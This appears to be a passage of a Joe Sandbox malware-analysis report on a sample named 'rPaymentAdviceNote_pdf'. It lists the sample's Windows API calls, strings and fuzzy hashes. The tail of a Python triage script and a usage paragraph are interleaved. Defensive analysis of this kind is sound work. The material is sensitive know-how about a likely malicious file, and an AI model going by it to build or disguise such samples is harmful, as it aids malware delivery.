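• Instruction Fuzzy Hash: F431B030A4821DABEB08FA68DD43EBE77A4FB10714F250428F512F51D2EB656F148693
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 008A44AC
• _wcscpy.LIBCMT ref: 008A4500
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008A4548
Strings
Similarity
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Instruction Fuzzy Hash: 3641D971A002147BEB11AB788C47EBF777CFF52710F04056AFA05E6183EB79D90196AA
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    runtime, other = triage(recs)
    print(f"{len(recs)} records, {len(runtime)} with AutoIt runtime markers")
    for r in recs:
        tag = "runtime" if r.has_autoit_markers() else "review"
        print(f"{r.first_ref() or '--------'} {tag:8} {len(r.calls):2} calls "
              f"api_string_id={r.api_string_id} fuzzy={r.fuzzy_hash[:16]}")
    print(modules_used(recs))
```

Feed it the report text saved from the browser; records without markers and with non-USER32 imports are the ones to open in the snapshot first. The marker list is deliberately narrow (tooltips_class32 or ThumbnailClass are ordinary Windows class names and would misfire), so extend it only with strings you have confirmed belong to the interpreter.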
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 008B5013
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008B501E
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 008B5029
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 008B5034
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 008B503F
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 008B504A
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 008B5055
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 008B5060
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 008B506B
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 008B5076
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 008B5081
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 008B508C
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 008B5097
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 008B50A2
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 008B50AD
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 008B50B8
                                                              • GetCursorInfo.USER32(?), ref: 008B50C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: d901ac9278472577478a80d1525bc09d4990601e377393a2e75db36474de0b0e
                                                              • Instruction ID: 371b909d2e0cfaefdbd25ae71a9263e5f333799a2a1c254d1ef93abbdb59390a
                                                              • Opcode Fuzzy Hash: d901ac9278472577478a80d1525bc09d4990601e377393a2e75db36474de0b0e
                                                              • Instruction Fuzzy Hash: E231E1B1D4871D6ADB109FBA8C899AFBFE8FF04750F50453AE50DE7280DA78A5018E91
                                                              APIs
                                                              • _memset.LIBCMT ref: 008CA259
                                                              • DestroyWindow.USER32(?,?), ref: 008CA2D3
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008CA34D
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008CA36F
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008CA382
                                                              • DestroyWindow.USER32(00000000), ref: 008CA3A4
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00840000,00000000), ref: 008CA3DB
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008CA3F4
                                                              • GetDesktopWindow.USER32 ref: 008CA40D
                                                              • GetWindowRect.USER32(00000000), ref: 008CA414
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008CA42C
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008CA444
                                                                • Part of subcall function 008425DB: GetWindowLongW.USER32(?,000000EB), ref: 008425EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1297703922-3619404913
                                                              • Opcode ID: fe376bc52f7ac4010d2e3e0ae9b3a90a6673c65892805425a1a1b5ee87c88935
                                                              • Instruction ID: e2bb6f4239564b65a38337473bfa4c2a26301919eaa8ed1bc3b63c7603e41202
                                                              • Opcode Fuzzy Hash: fe376bc52f7ac4010d2e3e0ae9b3a90a6673c65892805425a1a1b5ee87c88935
                                                              • Instruction Fuzzy Hash: B9716770144248AFEB29CF28C849F6A7BF6FB88708F04452CF985C72A1D774E906DB56
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 008CC627
                                                                • Part of subcall function 008CAB37: ClientToScreen.USER32(?,?), ref: 008CAB60
                                                                • Part of subcall function 008CAB37: GetWindowRect.USER32(?,?), ref: 008CABD6
                                                                • Part of subcall function 008CAB37: PtInRect.USER32(?,?,008CC014), ref: 008CABE6
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008CC690
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008CC69B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008CC6BE
                                                              • _wcscat.LIBCMT ref: 008CC6EE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 008CC705
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008CC71E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 008CC735
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 008CC757
                                                              • DragFinish.SHELL32(?), ref: 008CC75E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008CC851
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: d326904618409e73b38c2971e90c45f319e3dc8321f5fd36452bf448e8c20f67
                                                              • Instruction ID: 95cf00828c119febf598915f9c4cae9591cf47c0bcf492af3f46ab60ca122d7a
                                                              • Opcode Fuzzy Hash: d326904618409e73b38c2971e90c45f319e3dc8321f5fd36452bf448e8c20f67
                                                              • Instruction Fuzzy Hash: 16613A71108304AFD701EF68D885EAFBBF9FB99710F00092EF695D62A1DB709949CB52
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 008C4424
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008C446F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 51beca676d89fe3421a60d8042e7422a61ad2b52f0da7601ca97b76e3b1e1c63
                                                              • Instruction ID: f140d5ccc56e6fdec82f3784c33ab41d33832bb4c3291316caffaf74c322cdde
                                                              • Opcode Fuzzy Hash: 51beca676d89fe3421a60d8042e7422a61ad2b52f0da7601ca97b76e3b1e1c63
                                                              • Instruction Fuzzy Hash: 819169302003159BCB14EF28C461E6EB7A1FF95354F15886DE8D69B3A2DB31ED49CB82
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008CB8B4
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008C91C2), ref: 008CB910
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008CB949
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008CB98C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008CB9C3
                                                              • FreeLibrary.KERNEL32(?), ref: 008CB9CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008CB9DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,008C91C2), ref: 008CB9EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008CBA0B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008CBA17
                                                                • Part of subcall function 00862EFD: __wcsicmp_l.LIBCMT ref: 00862F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 7029ecc39d9b036d35e9e3b6f57921b8e9bbcac8cb5d9fec2b0909e1855cf1c4
                                                              • Instruction ID: 874d43f14cbcf85900e1516ff7cfa563f55f6dafefc21f14b48e3ee5c0bd8e28
                                                              • Opcode Fuzzy Hash: 7029ecc39d9b036d35e9e3b6f57921b8e9bbcac8cb5d9fec2b0909e1855cf1c4
                                                              • Instruction Fuzzy Hash: 0E61CF71900A19BAEB14DF68DC42FBA7BB8FB08720F10411AFA15D61D1EB74D994DBA0
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 008ADCDC
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008ADCEC
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008ADCF8
                                                              • __wsplitpath.LIBCMT ref: 008ADD56
                                                              • _wcscat.LIBCMT ref: 008ADD6E
                                                              • _wcscat.LIBCMT ref: 008ADD80
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008ADD95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADDA9
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADDDB
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADDFC
                                                              • _wcscpy.LIBCMT ref: 008ADE08
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008ADE47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 45d08252237f9a2bc4cf4cae9394c545f2cedfa9e45e0b0f65c40dc50eab8107
                                                              • Instruction ID: b70f63a4869e810d460132159c49c0012fe1bd6dcc3fa4fdc08724351b038310
                                                              • Opcode Fuzzy Hash: 45d08252237f9a2bc4cf4cae9394c545f2cedfa9e45e0b0f65c40dc50eab8107
                                                              • Instruction Fuzzy Hash: 3A615B725043099FDB20EF64C8449AEB3E8FF89324F04492EF98AC7651EB75E945CB52
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 008A9C7F
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008A9CA0
                                                              • __swprintf.LIBCMT ref: 008A9CF9
                                                              • __swprintf.LIBCMT ref: 008A9D12
                                                              • _wprintf.LIBCMT ref: 008A9DB9
                                                              • _wprintf.LIBCMT ref: 008A9DD7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 311963372-3080491070
                                                              • Opcode ID: 952c2e8d22c1b21b48825e556060cd8872b1efd8971f15bcf94d3d140ed2542e
                                                              • Instruction ID: 23370746145a9574a31b3656ebd856a448ee3852d08a1b2382f096656af28d2e
                                                              • Opcode Fuzzy Hash: 952c2e8d22c1b21b48825e556060cd8872b1efd8971f15bcf94d3d140ed2542e
                                                              • Instruction Fuzzy Hash: 3D516F3190460DAADF14EBA8DD86EEEBB78FF14300F500065F515F21A2EB352E99DB52
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • CharLowerBuffW.USER32(?,?), ref: 008AA3CB
                                                              • GetDriveTypeW.KERNEL32 ref: 008AA418
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AA460
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AA497
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AA4C5
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 2698844021-4113822522
                                                              • Opcode ID: ca6acc401aac23d76baa9abd6a4abe99b5c1fc704a0c95a2cf0897968e639199
                                                              • Instruction ID: 19f828ba9d58121aaba890922b6e349289e9577f97d848b49aa2c93f6686ae21
                                                              • Opcode Fuzzy Hash: ca6acc401aac23d76baa9abd6a4abe99b5c1fc704a0c95a2cf0897968e639199
                                                              • Instruction Fuzzy Hash: 565149711043099FD704EF28C88196EB7E4FF99758F00886DF89AD7662DB71AD09CB52
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0087E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0089F8DF
                                                              • LoadStringW.USER32(00000000,?,0087E029,00000001), ref: 0089F8E8
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • GetModuleHandleW.KERNEL32(00000000,00905310,?,00000FFF,?,?,0087E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0089F90A
                                                              • LoadStringW.USER32(00000000,?,0087E029,00000001), ref: 0089F90D
                                                              • __swprintf.LIBCMT ref: 0089F95D
                                                              • __swprintf.LIBCMT ref: 0089F96E
                                                              • _wprintf.LIBCMT ref: 0089FA17
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0089FA2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 984253442-2268648507
                                                              • Opcode ID: 8923f8dd36b21444236cbeac5b1abd3512daa36b3645b2dd1c78b63bc15b7f7f
                                                              • Instruction ID: 51ac439e518a13a32e910b4703eae2e13ddfc3d7adf0cd4ec2d1bc26edd9ccc9
                                                              • Opcode Fuzzy Hash: 8923f8dd36b21444236cbeac5b1abd3512daa36b3645b2dd1c78b63bc15b7f7f
                                                              • Instruction Fuzzy Hash: 5D410D7290421DAACF05FBE8DD86EEE7B78FF14310F500065B605E6192EB356F49CA62
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,008C9207,?,?), ref: 008CBA56
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA6D
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA78
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA85
                                                              • GlobalLock.KERNEL32(00000000), ref: 008CBA8E
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA9D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 008CBAA6
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBAAD
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBABE
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,008D2CAC,?), ref: 008CBAD7
                                                              • GlobalFree.KERNEL32(00000000), ref: 008CBAE7
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 008CBB0B
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 008CBB36
                                                              • DeleteObject.GDI32(00000000), ref: 008CBB5E
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008CBB74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: e9fd4a922ab8c05665bc9024659fe31a7f5c4c5a4f66a05bcb954298590a6576
                                                              • Instruction ID: a0c84cb0121e8578d0530e129f39a83e8e2a4d31fa077cd038c1ac3bd7a27d78
                                                              • Opcode Fuzzy Hash: e9fd4a922ab8c05665bc9024659fe31a7f5c4c5a4f66a05bcb954298590a6576
                                                              • Instruction Fuzzy Hash: D5412875601208EFEB119F65DC89EABBBB9FF89721F104069FA09D7261D7309D01CB60
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 008ADA10
                                                              • _wcscat.LIBCMT ref: 008ADA28
                                                              • _wcscat.LIBCMT ref: 008ADA3A
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008ADA4F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADA63
                                                              • GetFileAttributesW.KERNEL32(?), ref: 008ADA7B
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 008ADA95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADAA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: 7232cd6ea227a02ecd38ef626bfde6f6dcde43ee9bf170ae36cb260a621090e5
                                                              • Instruction ID: da9d148d77d14606b71682a322cf1a1fcd9bda8894e53de0c19f77562d51e1ce
                                                              • Opcode Fuzzy Hash: 7232cd6ea227a02ecd38ef626bfde6f6dcde43ee9bf170ae36cb260a621090e5
                                                              • Instruction Fuzzy Hash: BF8182715043459FDB24DF68C844AAFBBE4FF8A314F18882EF88AC7A51D630D945CB52
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008CC1FC
                                                              • GetFocus.USER32 ref: 008CC20C
                                                              • GetDlgCtrlID.USER32(00000000), ref: 008CC217
                                                              • _memset.LIBCMT ref: 008CC342
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008CC36D
                                                              • GetMenuItemCount.USER32(?), ref: 008CC38D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 008CC3A0
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008CC3D4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008CC41C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008CC454
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 008CC489
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: c415f4bd55bebd7dba25e4633b7f358cd17aeb105c0316a7f223d9e9c8a2a24e
                                                              • Instruction ID: 8548881893dc9054d51d87c4ab0a8792397fafefb5ad481f12041e19ba82ade3
                                                              • Opcode Fuzzy Hash: c415f4bd55bebd7dba25e4633b7f358cd17aeb105c0316a7f223d9e9c8a2a24e
